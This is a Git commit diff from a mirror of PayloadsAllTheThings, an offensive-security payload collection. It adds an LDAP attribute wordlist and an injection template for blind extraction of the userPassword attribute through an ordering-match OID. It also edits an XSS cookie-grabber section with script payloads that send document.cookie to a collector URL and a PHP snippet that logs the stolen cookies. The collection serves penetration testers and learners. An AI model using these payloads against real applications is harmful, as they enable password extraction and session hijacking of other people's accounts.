mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 18:36:10 +00:00
LDAP userPassword attribute
This commit is contained in:
parent
add00c7357
commit
4b7fe437a5
9
LDAP injection/Intruders/LDAP_attributes.txt
Normal file
9
LDAP injection/Intruders/LDAP_attributes.txt
Normal file
@ -0,0 +1,9 @@
|
||||
userPassword
|
||||
surname
|
||||
name
|
||||
cn
|
||||
sn
|
||||
objectClass
|
||||
mail
|
||||
givenName
|
||||
commonName
|
@ -66,7 +66,37 @@ We can extract using a bypass login
|
||||
(&(sn=administrator)(password=MYKE)) : OK
|
||||
```
|
||||
|
||||
## Defaults attributes
|
||||
|
||||
Can be used in an injection like `*)(ATTRIBUTE_HERE=*`
|
||||
|
||||
```bash
|
||||
userPassword
|
||||
surname
|
||||
name
|
||||
cn
|
||||
sn
|
||||
objectClass
|
||||
mail
|
||||
givenName
|
||||
commonName
|
||||
```
|
||||
|
||||
## Exploiting userPassword attribute
|
||||
|
||||
userPassword’ attribute in not a string like the ‘cn’ attribute for example but it’s an OCTET STRING
|
||||
In LDAP, every object, type, operator etc. is referenced by an OID : octetStringOrderingMatch (OID 2.5.13.18).
|
||||
|
||||
> octetStringOrderingMatch (OID 2.5.13.18): An ordering matching rule that will perform a bit-by-bit comparison (in big endian ordering) of two octet string values until a difference is found. The first case in which a zero bit is found in one value but a one bit is found in another will cause the value with the zero bit to be considered less than the value with the one bit.
|
||||
|
||||
```bash
|
||||
userPassword:2.5.13.18:=\xx (\xx is a byte)
|
||||
userPassword:2.5.13.18:=\xx\xx
|
||||
userPassword:2.5.13.18:=\xx\xx\xx
|
||||
```
|
||||
|
||||
## Thanks to
|
||||
|
||||
* [OWASP LDAP Injection](https://www.owasp.org/index.php/LDAP_injection)
|
||||
* [LDAP Blind Explorer](http://code.google.com/p/ldap-blind-explorer/)
|
||||
* [ECW 2018 : Write Up - AdmYSsion (WEB - 50) - 0xUKN](https://0xukn.fr/posts/WriteUpECW2018AdmYSsion/)
|
@ -464,3 +464,4 @@ More info: https://rancher.com/docs/rancher/v1.6/en/rancher-services/metadata-se
|
||||
* [PHP SSRF @secjuice](https://medium.com/secjuice/php-ssrf-techniques-9d422cb28d51)
|
||||
* [How I convert SSRF to xss in a ssrf vulnerable Jira](https://medium.com/@D0rkerDevil/how-i-convert-ssrf-to-xss-in-a-ssrf-vulnerable-jira-e9f37ad5b158)
|
||||
* [Piercing the Veil: Server Side Request Forgery to NIPRNet access](https://medium.com/bugbountywriteup/piercing-the-veil-server-side-request-forgery-to-niprnet-access-c358fd5e249a)
|
||||
* [Hacker101 SSRF](https://www.youtube.com/watch?v=66ni2BTIjS8)
|
||||
|
@ -19,7 +19,9 @@ Cookie grabber for XSS
|
||||
```php
|
||||
<?php
|
||||
// How to use it
|
||||
# <script>document.location='http://localhost/XSS/grabber.php?c=' + document.cookie</script>
|
||||
<script>document.location='http://localhost/XSS/grabber.php?c='+document.cookie</script>
|
||||
or
|
||||
<script>new Image().src="http://localhost/cookie.php?c="+document.cookie;</script>
|
||||
|
||||
// Write the cookie in a file
|
||||
$cookie = $_GET['c'];
|
||||
|
Loading…
Reference in New Issue
Block a user